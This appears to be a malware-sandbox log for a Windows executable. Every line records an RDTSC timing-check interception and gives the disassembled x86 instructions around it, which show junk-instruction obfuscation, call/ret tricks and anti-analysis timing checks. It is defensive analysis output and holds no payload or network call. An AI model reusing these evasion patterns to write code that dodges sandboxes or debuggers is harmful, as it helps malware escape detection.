Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFFB42 second address: AFFB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD5E912D9F4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0035B second address: B00378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B00378 second address: B00391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B01C32 second address: B01C55 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD5E9559C85h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD5E9559C7Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0275A second address: B02767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD5E912D9E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B029DA second address: B029E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B03CB4 second address: B03CCA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD5E912D9ECh 0x00000008 js 00007FD5E912D9E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B03CCA second address: B03CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B04959 second address: B0495F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0495F second address: B04963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0526B second address: B05286 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B05286 second address: B0528B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B076A7 second address: B076AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B09D59 second address: B09D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FD5E9559C7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B07872 second address: B07876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B07876 second address: B0787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0787C second address: B07912 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FD5E912D9E6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FD5E912D9F3h 0x00000013 jl 00007FD5E912D9E8h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FD5E912D9E8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 xor dword ptr [ebp+122D374Bh], ecx 0x0000003d mov ebx, dword ptr [ebp+122D3082h] 0x00000043 push dword ptr fs:[00000000h] 0x0000004a jc 00007FD5E912D9ECh 0x00000050 mov ebx, dword ptr [ebp+122D3713h] 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d and di, 42EFh 0x00000062 mov eax, dword ptr [ebp+122D0CA1h] 0x00000068 mov dword ptr [ebp+122D1B0Dh], edx 0x0000006e push FFFFFFFFh 0x00000070 sub dword ptr [ebp+122D3335h], ecx 0x00000076 push eax 0x00000077 push edi 0x00000078 jg 00007FD5E912D9ECh 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0ACE7 second address: B0AD4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D1ADDh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FD5E9559C78h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 jng 00007FD5E9559C78h 0x00000036 mov ebx, eax 0x00000038 xchg eax, esi 0x00000039 jmp 00007FD5E9559C88h 0x0000003e push eax 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0A083 second address: B0A087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0AE58 second address: B0AE73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0CD3F second address: B0CD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0C013 second address: B0C018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0C018 second address: B0C035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0DD3B second address: B0DD4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0FDC5 second address: B0FDFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD5E912D9F5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B0FDFA second address: B0FE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10E50 second address: B10E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10E56 second address: B10EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD5E9559C82h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 movsx ebx, ax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FD5E9559C78h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 ja 00007FD5E9559C82h 0x00000039 mov ebx, ecx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10EB6 second address: B10ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10015 second address: B100A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 29F7A222h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jne 00007FD5E9559C79h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FD5E9559C78h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e mov eax, dword ptr [ebp+122D05ADh] 0x00000044 mov bx, C0DBh 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007FD5E9559C78h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 add dword ptr [ebp+122D37FBh], ecx 0x0000006a jmp 00007FD5E9559C80h 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 push eax 0x00000074 pop eax 0x00000075 pushad 0x00000076 popad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B100A7 second address: B100D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD5E912D9F0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD5E912D9F7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B13F85 second address: B13F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B13F8B second address: B13F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B15CE1 second address: B15D02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD5E9559C89h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B15D02 second address: B15D54 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f mov dword ptr [ebp+122D372Bh], ebx 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D19DBh] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FD5E912D9E8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a jmp 00007FD5E912D9EDh 0x0000003f push eax 0x00000040 push esi 0x00000041 push esi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B140BE second address: B140C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B140C4 second address: B1417D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD5E912D9F4h 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2621h], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jmp 00007FD5E912D9F4h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FD5E912D9E8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 call 00007FD5E912D9EDh 0x00000048 mov ebx, dword ptr [ebp+122D30CCh] 0x0000004e pop ebx 0x0000004f mov dword ptr [ebp+122D19E1h], ecx 0x00000055 mov eax, dword ptr [ebp+122D0259h] 0x0000005b xor ebx, dword ptr [ebp+122D3809h] 0x00000061 push FFFFFFFFh 0x00000063 mov di, cx 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a jmp 00007FD5E912D9F1h 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B16C62 second address: B16C6C instructions: 0x00000000 rdtsc 0x00000002 js 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10FE2 second address: B10FE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B1417D second address: B14182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B10FE8 second address: B10FF2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD5E912D9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B16C6C second address: B16CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FD5E9559C85h 0x00000010 push edi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 popad 0x00000015 nop 0x00000016 js 00007FD5E9559C78h 0x0000001c mov edi, ebx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FD5E9559C78h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a jng 00007FD5E9559C7Ch 0x00000040 sbb ebx, 69D69CD4h 0x00000046 push 00000000h 0x00000048 xor ebx, dword ptr [ebp+122D37CDh] 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 je 00007FD5E9559C76h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B16CE5 second address: B16CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B14F89 second address: B14F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B15E90 second address: B15E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B17DEC second address: B17DF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B17DF1 second address: B17E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FD5E912D9F8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B17E03 second address: B17E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B17E07 second address: B17E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B16E5F second address: B16E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B1946F second address: B19474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B17F91 second address: B17F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B19474 second address: B1947A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B1947A second address: B1947E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B1DF0E second address: B1DF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B1DF14 second address: B1DF1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B1DF1A second address: B1DF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD5E912D9F3h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B21AFD second address: B21B25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FD5E9559C82h 0x0000000c jmp 00007FD5E9559C7Eh 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AC7176 second address: AC717C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B21588 second address: B2158F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2158F second address: B2159B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FD5E912D9E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2314D second address: B23155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B26396 second address: B2640B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD5E912D9F2h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007FD5E912D9F4h 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007FD5E912D9ECh 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f jmp 00007FD5E912D9F7h 0x00000024 pushad 0x00000025 jmp 00007FD5E912D9F9h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2640B second address: B26429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jmp 00007FD5E9559C80h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C3A6 second address: B2C3B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FD5E912D9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C607 second address: B2C60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C60B second address: B2C613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C76F second address: B2C779 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C779 second address: B2C77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C77D second address: B2C783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C935 second address: B2C93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2C93D second address: B2C956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FD5E9559C76h 0x0000000f jmp 00007FD5E9559C7Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2CAB2 second address: B2CAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: B2CEB2 second address: B2CEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD5E9559C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFCCFD second address: AFCD02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFCEFC second address: AFCF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFCF00 second address: AFCF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD237 second address: AFD245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FD5E9559C7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD245 second address: AFD25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007FD5E912D9F4h 0x0000000c pushad 0x0000000d je 00007FD5E912D9E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFD25A second address: AFD26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD5E9559C7Ah 0x00000010 rdtsc
